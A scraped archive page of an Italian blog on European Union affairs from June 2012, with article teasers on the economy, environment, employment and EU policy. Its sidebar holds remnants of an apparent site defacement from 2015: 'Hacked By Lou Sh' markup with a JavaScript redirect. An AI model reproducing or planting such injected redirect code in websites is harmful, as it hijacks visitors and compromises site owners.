EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Giugno 2012
it

L’estate è alle porte, la temperatura aumenta e con essa anche la voglia di concedersi una rilassante - e tutto sommato meritata - vacanza in una bella località di mare. Per quest’anno però dimenticatevi Maldive, Los Roques, Caraibi e Seychelles perché i mari europei non hanno niente da invidiare a questi luoghi. Stando infatti ai dati che emergono dall’ultima relazione dell’Agenzia europea dell’ambiente e della Commissione Ue, il 92,1 % dei mari europei sono di eccellente qualità o comunque soddisfano a pieno gli standard minimi di qualità fissati dalla direttiva sulle acque di balneazione.

Si chiama “EU Bathing Water Report” la nuova relazione annuale che ha esaminato nell’anno 2011 oltre 22.000 siti di balneazione europei, tra spiagge, laghi e fiumi. E dallo studio, condotto dal’Agenzia europea dell’Ambiente (AEA) e dalla Commissione europea, emerge che in “11 Paesi Ue - tra cui (...)

it

A Strasburgo il 16% in meno di salario percepito dalla donne rispetto ai colleghi maschi non è andato giù. L’Europarlamentare slovacca Edit Bauer ha espresso tutto il suo rammarico per questa situazione, improponibile nel XXI secolo, e ha chiesto la messa in atto di norme e sanzioni più dure.

Nella giornata del 24 maggio scorso il Parlamento Europeo ha fatto sentire nuovamente la sua voce sollecitando la Commissione ed il Consiglio della Comunità Europea ad intervenire su un tema cruciale: la retribuzione delle lavoratrici europee. Secondo i dati forniti dal sempre puntuale Eurostat, (...)

it

Un vertice intenso e teso quello tenutosi lo scorso 23 Maggio a Bruxelles tra i leader europei, i quali hanno discusso dell’ormai assodata crisi dell’Eurozona e delle misure da adottare per la crescita. Argomenti che hanno subito messo in luce i disaccordi tra François Hollande e Angela Merkel soprattutto per quanto concerne gli Eurobond, difesi a spada tratta dal Presidente Francese e considerati, invece, assolutamente inefficaci dalla Cancelliera tedesca.

Ma cosa sono gli Eurobond e perché alcuni li ritengono necessari? A partire dall’estate 2011, il termine Eurobond (o Stability bond) è stato utilizzato per indicare l’ipotetica creazione di obbligazioni del debito pubblico dei Paesi dell’Eurozona, la cui emissione sarebbe destinata ad un’apposita (...)

it

Sembrano non avere mai fine le polemiche sulla gestione dei rifiuti nella nostra Penisola. Ma cosa suggeriscono le politiche comunitarie a riguardo?

Molto probabilmente, nessuno obietterà se affermo che il fatto di vivere in un ambiente sano porti notevoli vantaggi sulla qualità della vita e sia di necessaria importanza per mantenersi in buona salute. Nonostante ogni essere umano sia consapevole di questa banalità, siamo quotidianamente (...)

it

I titolari di diverse Direzioni Generali dell'Unione europea dimostrano che l'attuazione di una politica energetica basata su fonti rinnovabili è possibile soprattutto in un periodo di crisi economica. Viene così spezzata la correlazione tra sfruttamento delle risorse naturali ed aumento dei costi.

La politica ambientale promossa dall’Unione europea include questioni che riguardano da vicino i cittadini. Essa presenta ripercussioni globali e strategiche, perciò necessita della collaborazione da parte dei titolari di alcune delle più importanti Direzioni Generali dell’esecutivo europeo. (...)

it

Il 7 maggio i vertici politici delle due potenze si sono riuniti per firmare un accordo che permetterà ad entrambe di accrescere il proprio stato culturale. La cooperazione tra l'Ue e la Repubblica del Sudafrica è costante ormai da anni, ma questo patto permetterà di far fare il salto di qualità che soprattutto gli africani si auguravano da tempo. Tante le tematiche che verranno approfondite e migliorate, principalmente in ambito di istruzione e mobilità giovanile.

Le relazioni tra il vecchio continente ed il Sudafrica sono da molto tempo ormai più che buone, con continui attestati di stima vicendevolemente scambiati. I più potrebbero pensare che il maggior interesse sia degli africani, i quali grazie agli aiuti dell’Europa dovrebbero migliorare la loro (...)

it

La poca informazione nei telegiornali e sulla carta stampata e la possibilità di far fare esperienza a giovani laureandi hanno portato un famoso ateneo italiano e un settore particolare della Presidenza del Consiglio a trovare un accordo al fine di sviluppare un’iniziativa stimolante di comunicazione e informazione.

Nel 2008 ha visto la luce un progetto innovativo e decisamente interessante che ha avuto come protagonisti principali l’Università degli Studi di Perugia e il Dipartimento Politiche Europee, insieme all’ormai immancabile comunicazione. Si tratta del progetto “Finestra sull’Europa” (FISE) ideato per (...)

it

Conosciamo realmente l’Europa? Questo è il quesito che l’Erasmus Day Live pone a noi giovani. Si tratta di un evento importante promosso dal Parlamento Europeo, dall’ Unione Camere Esperti Europei ( U.C.E.E.), organizzato dall’associazione culturale Erasmus Day Live e che ha come obiettivo quello di dare la possibilità alle nuove generazioni di conoscere in maniera approfondita l’Unione Europea, la sua storia e le sue Istituzioni. In che modo? Portando la cultura a “parlare” il linguaggio giovanile, attraverso la musica, lo sport, l’arte, spettacoli ed eventi informativi.

L’Erasmus Day Live tra Europa e Torino Per concretizzare tutto questo, l’Erasmus Day Live si avvale della stretta collaborazione di tutte le Università presenti sul territorio Europeo, unite nel dar avvio al primo “festival europeo universitario”, coinvolgendo il maggior numero di atenei possibili. (...)

it

Nella classifica Ue-27 per emissioni di gas serra l’Italia è al quarto posto e, secondo quanto attualmente previsto, entro il 2020 si registrerà un taglio solo dell’1,5%. A confermarlo è stata la Commissione europea nel documento allegato alle raccomandazioni che la stessa Commissione ha rivolto ai Paesi membri. Intanto la Merkel dice addio al nucleare. Dopo aver protratto la chiusura degli impianti radioattivi al 2035 e aver riscontrato per questa scelta numerose critiche, la cancelliera tedesca ha deciso di riproporre il progetto presentato nel 2001, anticipando la chiusura degli impianti nucleari non oltre il 2022.

I dati trasmessi dall’Ispra Ispra Secondo i dati trasmessi dall’Ispra, l’Italia è al quarto posto nell’Ue-27 per le emissioni di gas serra. E’ prevista una riduzione dell’1,5%. A trasmettere i dati relativi all’emissione di gas (...)

it

La crisi economica impone due modelli di intervento: la risoluzione delle emergenze e la pianificazione del domani. L'Ue conta di superare le difficoltà attuali mediante misure atte ad incentivare l'economia ed assicurare un futuro meno incerto alle prossime generazioni. Le parole chiave sono: nuovi strumenti finanziari, tolleranza zero ed ottimizzazione.

La crisi che da ormai quattro anni mette in ginocchio cittadini ed aziende ha reso l’opinione pubblica maggiormente sensibile alle questioni economiche. Giornali, telegiornali, libri, trasmissioni televisive e radiofoniche impazzano di notizie che trattano, da diverse prospettive, tutto ciò che (...)

it

Alla George Washington University, tra la 21esima e la H Street, le negoziazioni sono iniziate ufficialmente martedì ed hanno già prodotto i primi frutti: la delegazione italiana (Dario Mazzella, Caterina Bologni, Carmine Finelli, Fabrizio Ventriglia, Simone Tinelli, Igor Cerasa, Giuseppe Tommaselli, Lorenzo Bettini, Zana Nanic e Claudia Vanni), selezionata dalla Young Ambassadors Society, ha dimostrato già dalle prime ore di poter dare un contributo determinante alle trattative.

Nel settore degli Esteri, Carmine Finelli, ha sostenuto, con determinazione, che l’abbattimento delle barriere contro la donna, non sia finalizzato solo all’accesso elettorale e militare, ma coinvolga tutte le dinamiche all’interno della società civile. Nel comitato dell’Ambiente la proposta di (...)

it

La Commissione Europea, grazie ai suoi numerosi strumenti, è sempre in prima linea per salvaguardare la salute dei cittadini europei. Sotto la sua lente di ingrandimento è finito questa volta il consumo di tabacco e la dipendenza dal fumo e dalle sigarette. Le iniziative per ridurre questo vizio molto diffuso e poco salutare non mancano di certo e i sondaggi effettuati mostrano una sempre maggiore presa di coscienza dei cittadini stessi.

In occasione della Giornata mondiale senza tabacco, celebratasi lo scorso 31 maggio, la Commissione europea ha presentato la sua ricerca in merito all’atteggiamento dei cittadini europei nei confronti del tabacco. Le indagini della Commissione sono note con il nome di Eurobarometro. Istituiti (...)

it

L’avreste mai detto che in futuro l’immigrazione potrebbe rappresentare il giusto antidoto per la salvezza dei Paesi europei dal loro progressivo invecchiamento? Ebbene a mostrarci come questa possibilità stia diventando sempre più una realtà è il rapporto del 2011 dedicato all’immigrazione, all’asilo e alla libertà di movimento nell’Ue, presentato lo scorso 1 Giugno alla Commissione europea da Cecilia Malmstrom, Commissario per gli Affari Interni.

Si tratta della terza delle relazioni annuali dedicate a queste tematiche e indette, dal 2008, dal Consiglio Europeo con l’obiettivo di verificare, sia sul campo nazionale che su quello europeo, se e come sono state sviluppate capacità risolutive innovative di fronte alle sfide poste dal fenomeno (...)

it

Lo sviluppo delle reti a banda larga in tutta Europa è sempre più vicino. Ma affinché ciò possa avvenire i fondi pubblici dovranno incrementare, e non sostituire, gli investimenti dei privati. “Il controllo dell'utilizzo degli aiuti di Stato deve supportare gli obiettivi dell’Agenda digitale, mantenendo tuttavia gli incentivi agli investimenti privati. In questo settore strategico, è necessario un quadro dinamico per l’applicazione delle regole sugli aiuti di Stato che favorisca gli investimenti”, è quanto dichiarato da Joaquin Almunia, Commissario europeo alla Concorrenza.

Una delle sette iniziative proposte dalla strategia politica denominata Europa 2020 – nata per sostenere l’occupazione, la produttività e la coesione sociale nell’Ue – è la cosiddetta Agenda digitale europea che si propone di “sfruttare al meglio il potenziale delle tecnologie dell’informazione e (...)

it

Oltre il 60% dei votanti si è espresso a favore del Patto di Bilancio europeo. La scelta dei cittadini è stata coraggiosa e forse ha salvato l’Europa da una crisi di identità e di ideali. Così facendo, l’Irlanda è il quinto Paese a ratificare un accordo che marcia deciso verso la stabilità finanziaria.

In un momento molto delicato e particolare per l’Europa e per le sue istituzioni, più volte costrette a rimboccarsi le maniche di fronte all’imponente crisi finanziaria e alla perdita progressiva di fiducia nutrita nei confronti delle autorità politiche comunitarie, un bagliore di luce, proveniente (...)

it

Il nome del convegno è "Europa in città - Europa della conoscenza: ricerca, innovazione e tecnologia per la nostra crescita", e sarà moderato da Pierdomenico Perata, Prorettore e professore ordinario di Fisiologia vegetale della Sant'Anna stessa. Al centro dell'evento ci saranno temi d'attualità come la ricerca, la tecnologia e l'innovazione. L'intento è soprattutto quello di far capire come l'attuale crisi del sistema possa essere superata tramite un'intelligente gestione delle risorse, che dovranno essere messe a disposizione sempre più in ambiti quali appunto la ricerca ed il rinnovamento.

Il convegno è stato organizzato dal Parlamento europeo, coadiuvato dalla Commissione europea e dal Dipartimento per le politiche europee della Presidenza del Consiglio dei Ministri. Sullo sfondo anche l’importante collaborazione da parte di Anci, Europe Direct Pisa e del Ministero degli Affari (...)

it

L’ambizioso obiettivo di raggiungere, entro il 2020, la quota del 20% di energie rinnovabili è sempre più vicino. Ma la Commissione europea avverte: “senza un quadro adeguato per le rinnovabili, il periodo successivo al 2020 registrerebbe un crollo della crescita del settore”. Sarà necessario pertanto adottare, il prima possibile, una strategia concreta che permetta di tracciare un percorso netto almeno fino al 2030.

Era il lontano 2009 quando la Commissione europea adottò una direttiva sull’uso dell’energia da fonti rinnovabili che fissava obiettivi vincolanti per tutti gli Stati membri. Tutti questi Paesi, infatti, sono stati chiamati a conseguire obiettivi individuali in modo da raggiungere quella quota (...)

it

A pochi giorni dal consiglio europeo del 28 giugno, il Presidente del Consiglio Mario Monti si è rivolto alla Camera illustrando la crisi che il Paese sta vivendo. Annuncia l’avvio dell’ “operazione crescita”, un ulteriore passo avanti per lo sviluppo dell’Italia. A garantire il loro appoggio ci sono Bersani, Casini e Alfano. Quest’ultimo, più degli altri, ritiene necessario abbandonare la linea politica condotta dalla cancelliera tedesca Angela Merkel: solo abbandonando il rigore e la politica del “battere i pugni” il Paese potrà procedere verso la crescita e lo sviluppo.

Mario Monti si rivolge alla Camera "Operazione crescita" Il Presidente del Consiglio Mario Monti annuncia le misure che intende adottare per risollevare le sorti di un Paese alla prese con una forte crisi eco

it

Non “salvataggio” bensì “aiuto finanziario” ecco il modo in cui la Spagna preferisce definire l’offerta fatta lo scorso 9 Giugno dall’Eurogruppo per ricapitalizzare il suo settore bancario. Il governo Rajoy ha infatti ceduto alla pressioni internazionali finalizzate a far sì che egli richiedesse ufficialmente l’assistenza europea per rimettere in sesto la grave situazione provocata dalla crisi economica.

I “Fondi salva-Stati” sono stati interpellati per fornire gli aiuti di cui necessita la Spagna in questo particolare periodo ma, differentemente da quanto sperato da Madrid, questa serie di aiuti non verranno dati direttamente alle banche ma dovranno passare attraverso un organismo pubblico. Il (...)

it

Laszlo Andor, Commissario europeo per l'Occupazione, gli Affari sociali e l'Integrazione, si occupa delle questioni legate all'occupazione, alla discriminazione e ai temi sociali quale il welfare. Tra le priorità vi sono creazione di nuovi posti di lavoro, libera circolazione dei lavoratori nell'Ue, attenzione verso gli emarginati e progetti per i giovani.

La creazione di nuovi posti di lavoro è una priorità dell’Unione europea. La sensibilità dell’istituzione europea verso tale piaga sociale è dimostrata dall’esistenza dell’apposita Commissione per l’Occupazione, gli Affari Sociali e l’Integrazione. L’obiettivo del Commissario László Andor è lavorare con (...)

it

Il Centro di Eccellenza Jean Monnet dell’Università di Tor Vergata, in collaborazione con l’Istituto Italiano di Cultura a Bruxelles, la National School per la Pubblica Amministrazione e la Rappresentanza Permanente Italiana presso l’UE, organizza la nona edizione dei Jean Monnet Summer Seminars, dal titolo: “L’Italia e l’Unione Europea”, che si terrà a Bruxelles dal 9 al 13 luglio 2012.

Lo scopo di questa settimana di seminari è tracciare un’ approfondita, dettagliata analisi di come funzionino le relazioni tra Italia ed Unione Europea. I partecipanti acquisiranno una conoscenza capillare dei protagonisti e dei modi delle interazioni tra Italia e Unione Europea. Il seminario (...)

it

Con l'espansione dei BRICS, l'ascesa di nuove potenze, la crisi di vecchi protagonisti: quale corso prenderanno gli eventi dei vertici internazionali G8 & G20? La soluzione nel dibattito tra già noti attori e nuove giovani realtà.

Anche il G20 di Los Cabos è giunto alla sua conclusione. Dopo due giorni di negoziazioni, il 19 giugno i Leaders sono giunti alla firma della Declaration. Quattordici pagine, contenenti ottantacinque punti nei quali vengono discussi i più importanti temi di attualità internazionale e che (...)

it

La Grecia riuscirà a risollevarsi dalla pesante crisi che l'attanaglia? In quest'ottica sono state effettuate le nuove elezioni, con la vittoria di Antonis Samaras. Grazie anche al suo contributo la Grecia rimarrà in Europa (che cosa penserà adesso la Merkel?) e proverà a ripartire attraverso questa nuova spinta portata da un governo creato ad hoc per ristabilire la situazione.

Ecco che la Grecia torna alla ribalta, eleggendo un nuovo presidente. La ragione delle nuove elezioni è abbastanza semplice: le scorse non erano state capaci di costituire una maggioranza parlamentare solida. La situazione nel paese ellenico è abbastanza tragica, come ci raccontano ogni giorno i (...)

it

Le misure garantiscono migliori soluzioni per la gestione dei fondi europei. La garanzia di un più efficace controllo della spesa pubblica accresce l'efficacia delle politiche comunitarie e contribuisce alla tutela degli interessi dei contribuenti.

Dalia Grybauskaitè, ex Commissario europeo per la Programmazione finanziaria e il bilancio, ha affermato che “i nuovi programmi dell’Unione europea per il periodo 2007-2013 delineano un percorso verso il progresso economico”. Dalia Grybauskaitè E’ l’attuale Capo di Stato della Lituania. (...)

it

Lo scorso 7 Giugno una finestra si è aperta sull’Unione Europea: si tratta del “portale sulla trasparenza”che consentirà a tutti noi cittadini di informarci, far valere i nostri diritti e partecipare all’iter decisionale dell’UE, contribuendo al rafforzamento dell’Unione.

Quale mezzo più efficace se non Internet per rendere più trasparente l’intero sistema che governa l’Europa a coloro che vi abitano? Il sito, lanciato dalla Commissione Europea, ha come principale obiettivo quello di fornire all’utente tutte quelle informazioni che sono già presenti in rete ma che (...)

it

Tra le tantissime gatte da pelare di una boccheggiante UE si è aggiunto in settimana l’ultimo, in ordine cronologico, diktat dei big delle telecomunicazioni europee. I 23 amministratori delegati membri di Etno (l’Associazione europea degli operatori di telecomunicazioni), infatti, hanno chiesto a (...)

it

E’ quanto viene a galla nell’ultimo rapporto stilato dall’ILO (Organizzazione Internazionale del lavoro) sulle “Tendenze mondiali dell’occupazione nel 2012: prevenire una crisi più profonda dell’occupazione”. Lo studio analizza la crisi globale offrendo statistiche aggiornate sul tasso di disoccupazione giovanile sia a livello globale, sia regionale, e le raccomandazioni per limitare le attuali tendenze.

Secondo il rapporto dell’Onu, il numero dei disoccupati dall’inizio del 2008, cioè dall’inizio della crisi mondiale, è cresciuto drasticamente. Ad oggi risultano disoccupati quasi 75 milioni di giovani tra i 15 e i 24 anni in tutto il mondo, con un incremento di oltre 4 milioni dal 2007. Secondo le (...)

it

L'ACTA è un accordo commerciale che deve garantire regole efficienti al fine di combattere la contaffazione e la pirateria del web, tutelando al tempo stesso il diritto d'autore ed i servizi svolti tramite l'utilizzo di internet. A leggerla così sembrerebbe un patto volto alla stabilità ed al rispetto delle regole, ma in realtà non è proprio così. Dalla sua introduzione infatti sono state molte le proteste, con tanto di firme raccolte sul web per bloccarlo. La principale preoccupazione dei dissidenti riguarda la possibile (probabile, certa a detta loro) violazione dei diritti e delle libertà fondamentali dei cittadini.

L’INTA (la Commissione del Commercio Internazionale) al Parlamento d’Europa ha forse dato la definitiva stangata all’ACTA. Anch’essa, interpellata per prendere una decisione positiva o negativa riguardo alla questione dell’applicazione in ambito europeo del patto internazionale anticontraffazione. (...)

it

Il premio, organizzato per ricompensare le migliori pratiche innovative ed efficienti in materia di organizzazione dei tribunali o di attuazione di procedure giudiziarie civili in Europa, è assegnato da una giuria di 11 professionisti legali Europei (10 più il presidente di giuria). La cerimonia di consegna del premio ha luogo nell’ambito della Giornata europea della giustizia civile (25 ottobre). Nel passato il Premio comprendeva o la giustizia penale (2009), o la giustizia civile (2005, 2006, 2008). Per la prima volta, nel 2010, il premio ha compreso sia giustizia penale che civile. Cosa che si ripresenterà anche nella sesta edizione del 2012, in cui si darà particolare attenzione alle pratiche innovative nel campo della giustizia civile, finalizzate ad accrescere efficienza e funzionalità del sistema giudiziario, delle procedure e dell’organizzazione delle corti. La giornata è aperta a tutti i cittadini Ue, studenti e lavoratori nel campo giudiziario che potranno presentarsi liberamente a Vilnius (Lituania).

La competizione è aperta ai tribunali, alle associazioni, alle procure, alle organizzazioni non-governative, alle amministrazioni penitenziarie e a tutte le altre strutture operanti nel campo della giustizia. Possono partecipare gli enti aventi responsabilità nel Consiglio d’Europa e nell’Ue nel (...)

it

Danimarca, Germania, Estonia, Grecia, Spagna, Francia, Italia, Paesi Bassi, Polonia, Portogallo, Romania, Slovenia e Regno Unito. Sono questi gli Stati membri richiamati dalla Commissione europea a rimborsare ben 426 milioni di euro dei fondi della politica agricola comune (PAC), indebitamente spesi.

Cos’è la PAC PAC, acronimo che sta per Politica Agricola Comunitaria, è una delle politiche dell’Unione Europea i cui obiettivi fondamentali sono “assicurare agli agricoltori un tenore di vita adeguato e garantire ai consumatori la costante disponibilità di prodotti alimentari sicuri e a prezzi (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato



Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France